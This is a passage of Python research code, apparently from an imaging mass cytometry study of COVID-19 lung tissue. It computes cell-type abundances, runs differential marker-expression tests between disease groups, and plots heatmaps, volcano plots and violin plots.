c = annot.groupby([f"metacluster_labels_{res}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"metacluster_labels_{res}", columns="phenotypes", values=0
)
p = np.log2(p / ct)
conf = "z"
grid = clustermap(m, row_colors=p, config=conf, figsize=(8, 3.4))
grid.fig.savefig(
output_prefix
+ f"phenotypes.filtered.metacluster_labels_{res}.clustermap.norm.{conf}.svg",
**consts.figkws,
)
def metacluster_expression(prj: Project) -> None:
(consts.output_dir / "phenotyping").mkdir()
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_ff = output_prefix + "quantification.filtered.pq"
quant = pd.read_parquet(quant_ff)
# Drop unwanted channels and redundant morphological features
h5ad_f = output_prefix + "sample_zscore.h5ad"
a = sc.read(h5ad_f)
a.obs = a.obs.merge(consts.phenotypes.reset_index())
a.obs["disease"] = pd.Categorical(
a.obs["phenotypes"].str.split("_").apply(lambda x: x[0]).values,
categories=["Healthy", "COVID19"],
ordered=True,
)
res = 2.0
a.obs[f"cluster_labels_{res}"] = a.obs[f"cluster_{res}"].replace(
consts.cluster_idents[res]
)
a.obs[f"metacluster_labels_{res}"] = (
a.obs[f"cluster_labels_{res}"].str.extract(r"(.*) \(")[0].values
)
a.obs[f"cluster_labels_{res}"].value_counts().filter(regex=r"^[^\?]")
a.obs[f"metacluster_labels_{res}"].value_counts().filter(regex=r"^[^\?]")
h5ad_f = output_prefix + "sample_zscore.labeled.h5ad"
sc.write(h5ad_f, a)
# Cell type abundances
count = a.obs.groupby(["roi", f"cluster_labels_{res}"]).size()
total = a.obs.groupby(["roi"]).size()
area = pd.Series(
{roi.name: roi.area for roi in prj.rois}, name="area"
).rename_axis(index="roi")
# normalize by total or area
perc = ((count / total) * 100).rename("percentage")
exte = ((count / area) * 1e6).rename("absolute")
count_red = a.obs.groupby(["roi", f"metacluster_labels_{res}"]).size()
perc_red = ((count_red / total) * 100).rename("percentage")
exte_red = ((count_red / area) * 1e6).rename("absolute")
# get roi_attributes
roi_attributes = (
a.obs[["roi", "sample", "phenotypes", "disease"]]
.drop_duplicates()
.set_index("roi")
)
# Plot cluster abundance per disease group
_stats = list()
for group, ext in [("cluster", ""), ("metacluster", "_red")]:
for factor in ["disease", "phenotypes"]:
for name, dt in [("percentage", "perc"), ("absolute", "exte")]:
df = locals()[dt + ext]
p = df.to_frame().pivot_table(
index="roi", columns=f"{group}_labels_{res}", values=name
)
kws = dict(
data=p.join(roi_attributes),
x=factor,
y=p.columns,
plot_kws=dict(palette=consts.colors[factor]),
)
fig, stats = swarmboxenplot(**kws)
_stats.append(
stats.assign(group=group, factor=factor, name=name)
)
fig.savefig(
output_prefix
+ f"phenotypes.{group}s.abundance.{name}.by_{factor}.swarmboxenplot.svg",
**consts.figkws,
)
stats = pd.concat(_stats)
stats.to_csv(
output_prefix + "abundance.differential_testing.csv", index=False
)
# Some single-cell heatmaps
a.obs.index = a.obs.index.astype(str)
a2 = a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?").values, :]
a2.X = z_score(a2.X.T).T
a2 = a2[:, ~a2.var.index.isin(consts.tech_channels)]
# Get clustered order for markers
marker_order = clustermap(
a2.to_df()
.groupby(a2.obs[f"metacluster_labels_{res}"].values)
.mean()
.corr()
).dendrogram_row.reordered_ind
fig = sc.pl.heatmap(
a2,
a2.var.index[marker_order],
groupby=f"metacluster_labels_{res}",
use_raw=False,
cmap="RdBu_r",
vmin=-6,
vmax=6,
show=False,
)["heatmap_ax"].figure
fig.savefig(
output_prefix + "phenotypes.metaclusters.expression.heatmap.svg",
**consts.figkws,
)
# ## same but by metacluster
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# for metacluster in metaclusters:
# a3 = a2[a2.obs[f'metacluster_labels_{res}'] == metacluster, :]
# fig = sc.pl.heatmap(
# a3,
# functional_markers,
# groupby="phenotypes",
# use_raw=False,
# cmap="RdBu_r",
# vmin=-6,
# vmax=6,
# show=False,
# )["heatmap_ax"].figure
# fig.savefig(
# output_prefix + "phenotypes.metaclusters.expression.heatmap.svg",
# **consts.figkws,
# )
# Now aggregated by cluster
for factor in ["", "disease", "phenotypes"]:
groups = [f"metacluster_labels_{res}"] + (
[factor] if factor != "" else []
)
kws = dict(
adata=a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :],
var_names=a.var.index[marker_order],
groupby=groups,
use_raw=False,
cmap="RdBu_r",
show=False,
vmin=-6,
vmax=6,
)
fig = sc.pl.matrixplot(
**kws,
)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.heatmap.svg",
**consts.figkws,
)
fig = sc.pl.dotplot(**kws)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.dotplot.svg",
**consts.figkws,
)
for factor in ["", "disease", "phenotypes"]:
groups = [f"metacluster_labels_{res}"] + (
[factor] if factor != "" else []
)
fig = sc.pl.stacked_violin(
a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :],
a.var.index[marker_order],
groupby=groups,
use_raw=False,
show=False,
)["mainplot_ax"].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.by_{factor}.stacked_violinplot.svg",
**consts.figkws,
)
# Test for differential expression within each metacluster between disease groups
metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
_diff_res = list()
for factor in ["phenotypes", "disease"]:
for metacluster in metaclusters:
a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
a3.X += abs(a3.X.min())
groups = a3.obs[factor].unique()[1:]
# sc.tl.rank_genes_groups(
# a3,
# factor,
# use_raw=False,
# reference="Healthy",
# # method="t-test_overestim_var",
# method="wilcoxon",
# )
sc.tl.rank_genes_groups(
a3,
factor,
use_raw=True,
reference="Healthy",
method="t-test_overestim_var",
# method="wilcoxon",
)
_diff_res.append(
pd.concat(
[
pd.DataFrame(
{
"marker": a3.uns["rank_genes_groups"]["names"][
group
],
"logfoldchanges": a3.uns["rank_genes_groups"][
"logfoldchanges"
][group],
"pvals": a3.uns["rank_genes_groups"]["pvals"][
group
],
"pvals_adj": a3.uns["rank_genes_groups"][
"pvals_adj"
][group],
}
).assign(
metacluster=metacluster, group=group, factor=factor
)
for group in groups
]
)
)
diff_res = pd.concat(_diff_res)
diff_res.to_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.csv"
)
# diff_res = pd.read_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.csv",
# index_col=0
# )
# # Test for differential expression within each metacluster between disease groups
# n_random = 25 # TODO: run with higher N
# a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# _diff_res = list()
# for factor in ["phenotypes", "disease"]:
# for metacluster in metaclusters:
# a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
# a3.X += abs(a3.X.min())
# groups = a3.obs[factor].unique()[1:]
# n = a3.obs["sample"].value_counts().min()
# for i in range(n_random):
# cells = list()
# for sample in a3.obs["sample"].unique():
# cells += (
# a3.obs.query(f"sample == '{sample}'")
# .sample(n=n)
# .index.tolist()
# )
# a4 = a3[cells, :]
# sc.tl.rank_genes_groups(
# a4,
# factor,
# use_raw=False,
# reference="Healthy",
# method="t-test_overestim_var",
# # method="wilcoxon",
# )
# _diff_res.append(
# pd.concat(
# [
# pd.DataFrame(
# {
# "marker": a4.uns["rank_genes_groups"][
# "names"
# ][group],
# "logfoldchanges": a4.uns[
# "rank_genes_groups"
# ]["logfoldchanges"][group],
# "pvals": a4.uns["rank_genes_groups"][
# "pvals"
# ][group],
# "pvals_adj": a4.uns["rank_genes_groups"][
# "pvals_adj"
# ][group],
# }
# ).assign(
# metacluster=metacluster,
# group=group,
# factor=factor,
# iter=i,
# )
# for group in groups
# ]
# )
# )
# diff_res = pd.concat(_diff_res)
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.csv"
# )
# import scipy
# diff_res = (
# diff_res.groupby(["marker", "group", "factor", "metacluster"]).agg(
# {
# "logfoldchanges": np.mean,
# "pvals": lambda x: scipy.stats.combine_pvalues(x)[1],
# "pvals_adj": lambda x: scipy.stats.combine_pvalues(x)[1],
# }
# )
# # .drop("iter", 1)
# .reset_index()
# )
# # Simple mann-whitney
# metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
# a.obs["disease"] = a.obs["phenotypes"].str.split("_").apply(lambda x: x[0])
# _diff_res = list()
# for factor in ["phenotypes", "disease"]:
# for metacluster in metaclusters:
# a3 = a[a.obs[f"metacluster_labels_{res}"] == metacluster, :]
# # x = a3.to_df().join(a3.obs[['roi']]).groupby(['roi']).mean()[consts.functional_markers]
# x = a3.raw.to_adata().to_df().join(a3.obs[['roi']]).groupby(['roi']).mean()[consts.functional_markers]
# fig, stats = swarmboxenplot(data=x.join(roi_attributes), x=factor, y=x.columns)
# _diff_res.append(stats.assign(metacluster=metacluster, factor=factor))
# plt.close('all')
# diff_res = pd.concat(_diff_res)
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.raw.mannwhitney.csv"
# )
# diff_res.to_csv(
# output_prefix
# + "phenotypes.metaclusters.expression.differential_testing.zscore.mannwhitney.csv"
# )
# # adapt to fit scanpy diff results
# diff_res = diff_res.rename(columns={'p-unc': 'pvals', 'p-cor': 'pvals_adj', 'hedges': 'logfoldchanges', "Variable": 'marker', "factor": "group"})
# diff_res['logfoldchanges'] *= -1
# diff_res = diff_res.loc[diff_res['A'] != 'Healthy']
# diff_res.loc[diff_res['group'] == 'disease', 'group'] = "COVID19"
# diff_res.loc[diff_res['group'] == 'phenotypes', 'group'] = diff_res.loc[diff_res['group'] == 'phenotypes', 'B']
diff_res = diff_res.dropna()
diff_res["-logp"] = -np.log10(diff_res["pvals"])
v = diff_res["-logp"].replace(np.inf, np.nan).dropna().max()
diff_res["-logp"] = diff_res["-logp"].replace(np.inf, v)
diff_res["marker_name"] = (
diff_res["marker"].str.split("(").apply(lambda x: x[0])
)
diff_res = diff_res.loc[diff_res["marker"].isin(consts.functional_markers)]
# Heatmap of log fold changes + pvalues
lfc = diff_res.pivot_table(
index=["metacluster", "group"],
columns="marker",
values="logfoldchanges",
).loc[:, consts.functional_markers]
p = diff_res.pivot_table(
index=["metacluster", "group"],
columns="marker",
values="pvals_adj",
).loc[:, consts.functional_markers]
sigs = p < 1e-15
sigs = p < 0.05
fig, ax = plt.subplots(figsize=(8, 6))
sns.heatmap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
# vmin=-10,
# vmax=10,
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
ax=ax,
)
for i, c in enumerate(ax.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.joint_stats.heatmap.svg",
**consts.figkws,
)
# Volcano plots
diff_res["-logp"] = (-np.log10(diff_res["pval"])).replace(np.inf, 16)
diff_res = diff_res.rename(
columns={
"contrast": "group",
"cell_type": "metacluster",
"gene": "marker_name",
"log2fc": "logfoldchanges",
}
)
diff_res["group"] = (
diff_res["group"]
.replace("COVID19_all", "COVID19")
.replace("all", "COVID19")
)
diff_res["factor"] = "disease"
fig, axes = plt.subplots(
3,
3,
figsize=(4 * 2.7, 4 * 2.7),
sharex=False,
sharey=False,
gridspec_kw=dict(hspace=0.5, wspace=0.5),
)
for ax in axes.flat:
ax.axvline(0, linestyle="--", color="grey")
ax.axhline(5, linestyle="--", color="grey", linewidth=0.3)
for metacluster, ax in zip(metaclusters, axes.flat):
p = diff_res.query(
f"metacluster == '{metacluster}' & group == 'COVID19' & factor == 'disease'"
)
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker_name"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[2][-1].set_visible(False)
axes[1][0].set(ylabel="-log(p-value)")
axes[-1][1].set(xlabel="log(fold-change)")
axes[0][1].set_title("COVID19 vs Healthy\n" + axes[0][1].get_title())
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.volcano_plots.disease.svg",
**consts.figkws,
)
fig, axes = plt.subplots(
3 * 2,
3,
figsize=(4 * 2.7, 4 * 2.7 * 2),
sharex=False,
sharey=False,
gridspec_kw=dict(hspace=0.5, wspace=0.5),
)
for ax in axes.flat:
ax.axvline(0, linestyle="--", color="grey")
ax.axhline(5, linestyle="--", color="grey", linewidth=0.3)
for metacluster, ax in zip(metaclusters, axes[:3].flat):
p = diff_res.query(
f"metacluster == '{metacluster}' & group == 'COVID19_early' & factor == 'phenotypes'"
)
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker_name"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[2][-1].set_visible(False)
for metacluster, ax in zip(metaclusters, axes[3:].flat):
p = diff_res.query(
f"metacluster == '{metacluster}' & group == 'COVID19_late'"
)
v = p["logfoldchanges"].abs().max()
v += v * 0.1
ax.scatter(
p["logfoldchanges"],
p["-logp"],
s=10,
alpha=0.5,
c=p["logfoldchanges"],
cmap="coolwarm",
vmin=-v,
vmax=v,
)
ax.set(title=metacluster)
top = (
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
)
for x in top.tail(5).index:
ha = "right" if p.loc[x, "logfoldchanges"] < 0 else "left"
ax.text(
p.loc[x, "logfoldchanges"],
p.loc[x, "-logp"],
s=p.loc[x, "marker"],
ha=ha,
)
ax.set(xlim=(-v, v))
axes[-1][-1].set_visible(False)
axes[1][0].set(ylabel="-log(p-value)")
axes[-2][0].set(ylabel="-log(p-value)")
axes[-1][1].set(xlabel="log(fold-change)")
axes[0][1].set_title("COVID19_early vs Healthy\n" + axes[0][1].get_title())
axes[-3][1].set_title("COVID19_late vs Healthy\n" + axes[-3][1].get_title())
fig.savefig(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.volcano_plots.phenotypes.svg",
**consts.figkws,
)
# Violinplots
diff_res = pd.read_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.csv",
index_col=0,
)
# diff_res = (
# diff_res.groupby(["marker", "group", "factor", "metacluster"])
# .mean()
# .drop("iter", 1)
# .reset_index()
# )
diff_res = diff_res.dropna()
diff_res["-logp"] = -np.log10(diff_res["pvals"])
v = diff_res["-logp"].replace(np.inf, np.nan).dropna().max()
diff_res["-logp"] = diff_res["-logp"].replace(np.inf, v)
metaclusters = a2.obs[f"metacluster_labels_{res}"].unique()
for metacluster in metaclusters:
for factor in ["disease", "phenotypes"]:
a3 = a2[a2.obs[f"metacluster_labels_{res}"] == metacluster, :]
a3.obs[factor] = pd.Categorical(
a3.obs[factor],
categories=a2.obs[factor].cat.categories,
ordered=True,
)
kws = dict(
groupby=factor,
use_raw=True,
stripplot=False,
multi_panel=True,
order=a3.obs[factor].cat.categories,
show=False,
)
fig = sc.pl.violin(a3, a3.var.index, **kws)[0].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.{metacluster}.{factor}.violinplots.svg",
**consts.figkws,
)
for group in a3.obs[factor].cat.categories[1:]:
p = diff_res.query(
f"metacluster == '{metacluster}' & group == '{group}'"
)
p = p.loc[p["marker"].isin(consts.functional_markers), :]
top = p.loc[
(
p[["logfoldchanges", "-logp"]]
.abs()
.apply(z_score)
.mean(1)
.sort_values()
.tail(3)
.index
),
"marker",
][::-1]
fig = sc.pl.violin(a3, top, **kws)[0].figure
fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.{metacluster.replace(' ', '')}.{factor}.violinplots.top_diff_{group}.svg",
**consts.figkws,
)
def differential_diffxpy(prj) -> None:
import diffxpy.api as de
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
# load cell types from h5ad
h5ad_f = (
consts.output_dir / "phenotyping" / prj.name
+ "."
+ "sample_zscore.labeled.h5ad"
)
a = sc.read(h5ad_f).raw.to_adata()
_diff_res = list()
for group in ["all", "COVID19_early", "COVID19_late", "between"]:
if group == "all":
a2 = a.copy()
elif group == "between":
a2 = a[~a.obs["phenotypes"].isin(["Healthy"])]
a2.obs["phenotypes"] = a2.obs[
"phenotypes"
].cat.remove_unused_categories()
else:
a2 = a[a.obs["phenotypes"].isin(["Healthy", group])]
a2.obs["phenotypes"] = a2.obs[
"phenotypes"
].cat.remove_unused_categories()
a2.obs["p"] = a2.obs["phenotypes"].cat.codes
part = de.test.partition(data=a2, parts="metacluster_labels_2.0")
test_part = part.wald(formula_loc="~ 1 + p", factor_loc_totest="p")
diff_res = pd.concat(
[
r.summary().assign(cell_type=n)
for n, r in zip(test_part.partitions, test_part.tests)
]
).assign(contrast=group)
_diff_res.append(diff_res)
diff_res = pd.concat(_diff_res)
diff_res.to_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.raw_values.wald.csv"
)
diff_res = pd.read_csv(
output_prefix
+ "phenotypes.metaclusters.expression.differential_testing.raw_values.wald.csv",
index_col=0,
)
diff_res = diff_res.loc[
diff_res["contrast"].isin(["all", "COVID19_early", "COVID19_late"])
]
diff_res["contrast"] = diff_res["contrast"].replace("all", "COVID19_all")
diff_res["gene"] = [x.split("(")[0] for x in diff_res["gene"]]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="log2fc",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="pval",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="gene",
values="qval",
).loc[:, funct]
sigs = padj < 1e-25
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
# col_colors=np.log1p(a.to_df()[funct].mean())
# .rename("Channel mean")
# .clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.joint.svg",
**consts.figkws,
)
grid = clustermap(
lfc.loc[:, "COVID19_all", :],
annot=sigs.loc[:, "COVID19_all", :],
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
# col_colors=np.log1p(a.to_df()[funct].mean())
# .rename("Channel mean")
# .clip(0, 1),
figsize=(6, 4),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.joint.both.svg",
**consts.figkws,
)
for group in ["all", "COVID19_early", "COVID19_late", "between"]:
diff = diff_res.query(f"contrast == '{group}'")
# Heatmap of log fold changes + pvalues
lfc = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="log2fc",
).loc[:, consts.functional_markers]
p = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="pval",
).loc[:, consts.functional_markers]
padj = diff.pivot_table(
index=["cell_type"],
columns="gene",
values="qval",
).loc[:, consts.functional_markers]
sigs = padj < 1e-10
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.joint_stats.heatmap.{group}.svg",
**consts.figkws,
)
# with statsmodels
import statsmodels.formula.api as smf
import pingouin as pg
df = a.to_df().join(a.obs[["phenotypes", "metacluster_labels_2.0"]])
_res = list()
for ct in a.obs["metacluster_labels_2.0"].unique():
df2 = df.loc[
df["metacluster_labels_2.0"] == ct,
consts.functional_markers + ["phenotypes"],
]
df2.columns = [x.split("(")[0] for x in df2.columns]
for m in df2.columns.drop(["phenotypes"]):
res = smf.ols(f"{m} ~ phenotypes", df2).fit()
_res.append(
pd.DataFrame(
{
"coef": res.params,
"p-value": res.pvalues,
"marker": m,
"cell_type": ct,
}
)
)
diff_res = pd.concat(_res).drop("Intercept").rename_axis("contrast")
diff_res["qval"] = pg.multicomp(diff_res["p-value"].values, method="bonf")[
1
]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="coef",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="p-value",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="qval",
).loc[:, funct]
sigs = padj < 1e-25
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.statsmodels.heatmap.joint.svg",
**consts.figkws,
)
# Pseudobulk approach
df = (
a.to_df()
.join(a.obs[["phenotypes", "roi", "metacluster_labels_2.0"]])
.groupby(["phenotypes", "roi", "metacluster_labels_2.0"])
.mean()
.reset_index()
)
_res = list()
for ct in a.obs["metacluster_labels_2.0"].unique():
df2 = df.loc[
df["metacluster_labels_2.0"] == ct,
consts.functional_markers + ["phenotypes"],
]
df2.columns = [x.split("(")[0] for x in df2.columns]
for m in df2.columns.drop(["phenotypes"]):
res = smf.ols(f"{m} ~ phenotypes", df2).fit()
_res.append(
pd.DataFrame(
{
"coef": res.params,
"p-value": res.pvalues,
"marker": m,
"cell_type": ct,
}
)
)
diff_res = pd.concat(_res).drop("Intercept").rename_axis("contrast")
diff_res["qval"] = pg.multicomp(diff_res["p-value"].values, method="bonf")[
1
]
funct = [x.split("(")[0] for x in consts.functional_markers]
lfc = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="coef",
).loc[:, funct]
p = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="p-value",
).loc[:, funct]
padj = diff_res.pivot_table(
index=["cell_type", "contrast"],
columns="marker",
values="qval",
).loc[:, funct]
sigs = padj < 0.05
grid = clustermap(
lfc,
annot=sigs,
center=0,
cmap="RdBu_r",
xticklabels=True,
yticklabels=True,
cbar_kws=dict(label="log fold change\n(over healthy)"),
row_cluster=False,
col_cluster=False,
vmin=-3.5,
vmax=3.5,
col_colors=np.log1p(a.to_df()[consts.functional_markers].mean())
.rename("Channel mean")
.clip(0, 1),
)
for i, c in enumerate(grid.ax_heatmap.get_children()):
if isinstance(c, matplotlib.text.Text):
if c.get_text() == "0":
c.set_visible(False)
# ax.get_children().pop(i)
elif c.get_text() == "1":
c.set_text("*")
grid.fig.savefig(
output_prefix
+ f"phenotypes.metaclusters.expression.differential_testing.raw_values.wald.statsmodels_pseudobulk.heatmap.joint.svg",
**consts.figkws,
)
def threshold_positiveness():
import yaml
from imc.operations import (
get_best_mixture_number,
get_threshold_from_gaussian_mixture,
)
(consts.output_dir / "gating").mkdir()
# load quantification
prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_ff = prefix + "quantification.filtered.pq"
quant = pd.read_parquet(quant_ff)
ids = ["sample", "roi"]
quant = pd.concat([np.log1p(quant.drop(ids, axis=1)), quant[ids]], axis=1)
# load cell types from h5ad
h5ad_f = (
consts.output_dir / "phenotyping" / prj.name
+ "."
+ "sample_zscore.labeled.h5ad"
)
a = sc.read(h5ad_f)
# remove excluded channels
exc = prj.rois[0].channel_exclude[prj.rois[0].channel_exclude].index
quant = quant.drop(exc, axis=1, errors="ignore")
# # Univariate gating of each channel per sample
# thresholds_file = consts.output_dir / "thresholds.activation.json"
# mixes_file = consts.output_dir / "mixes.activation.json"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in quant.columns.drop(ids):
# if m not in thresholds:
# mixes[m] = get_best_mixture_number(quant[m], 2, 8)
# thresholds[m] = get_threshold_from_gaussian_mixture(
# quant[m], None, mixes[m]
# ).to_dict()
# json.dump(thresholds, open(thresholds_file, "w"), indent=4)
# json.dump(mixes, open(mixes_file, "w"), indent=4)
# thresholds = json.load(open(thresholds_file))
# mixes = json.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.pq"
# if not gating_file.exists():
# pos = pd.DataFrame(index=quant.index, columns=consts.functional_markers)
# for m in consts.functional_markers:
# name = m.split("(")[0]
# o = sorted(thresholds[m])
# if mixes[m] == 2:
# pos[m] = quant[m] > thresholds[m][o[0]]
# else:
# pos[m] = quant[m] > thresholds[m][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = quant.loc[sel, m] > thresholds[m][o[-2]]
# pos = pd.concat([pos, quant[ids]], axis=1)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# pos.index.name = "obj_id"
# # Univariate gating of each channel (per sample)
# thresholds_file = (
# consts.output_dir / "thresholds.activation.per_sample.yaml"
# )
# mixes_file = consts.output_dir / "mixes.activation.per_sample.yaml"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in consts.functional_markers:
# for s in quant["sample"].unique():
# if (m, s) not in thresholds:
# y = quant.query(f"sample == '{s}'")
# mixes[(m, s)] = get_best_mixture_number(y[m], 2, 8)
# thresholds[(m, s)] = get_threshold_from_gaussian_mixture(
# y[m], None, mixes[(m, s)]
# ).to_dict()
# yaml.dump(thresholds, open(thresholds_file, "w"))
# yaml.dump(mixes, open(mixes_file, "w"))
# thresholds = yaml.load(open(thresholds_file))
# mixes = yaml.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.per_sample.pq"
# if not gating_file.exists():
# _pos = list()
# for s in quant["sample"].unique():
# y = quant.query(f"sample == '{s}'")
# pos = pd.DataFrame(index=y.index, columns=consts.functional_markers)
# for m in consts.functional_markers:
# o = sorted(thresholds[(m, s)])
# if mixes[(m, s)] == 2:
# pos[m] = y[m] > thresholds[(m, s)][o[0]]
# else:
# pos[m] = y[m] > thresholds[(m, s)][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = y.loc[sel, m] > thresholds[(m, s)][o[-2]]
# _pos.append(pd.concat([pos, y[ids]], axis=1))
# pos = pd.concat(_pos, axis=0)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# # Univariate gating of each channel per sample (with Z-scored data)
# zquant = a.to_df()
# thresholds_file = consts.output_dir / "thresholds.activation.zscore.json"
# mixes_file = consts.output_dir / "mixes.activation.zscore.json"
# if not (thresholds_file.exists() and thresholds_file.exists()):
# mixes = dict()
# thresholds = dict()
# for m in consts.functional_markers:
# if m not in thresholds:
# mixes[m] = get_best_mixture_number(zquant[m], 2, 8)
# thresholds[m] = get_threshold_from_gaussian_mixture(
# zquant[m], None, mixes[m]
# ).to_dict()
# json.dump(thresholds, open(thresholds_file, "w"), indent=4)
# json.dump(mixes, open(mixes_file, "w"), indent=4)
# thresholds = json.load(open(thresholds_file))
# mixes = json.load(open(mixes_file))
# # Make dataframe with population for each marker
# gating_file = consts.output_dir / "gating" / "positive.z_score.pq"
# if not gating_file.exists():
# pos = pd.DataFrame(index=quant.index, columns=consts.functional_markers)
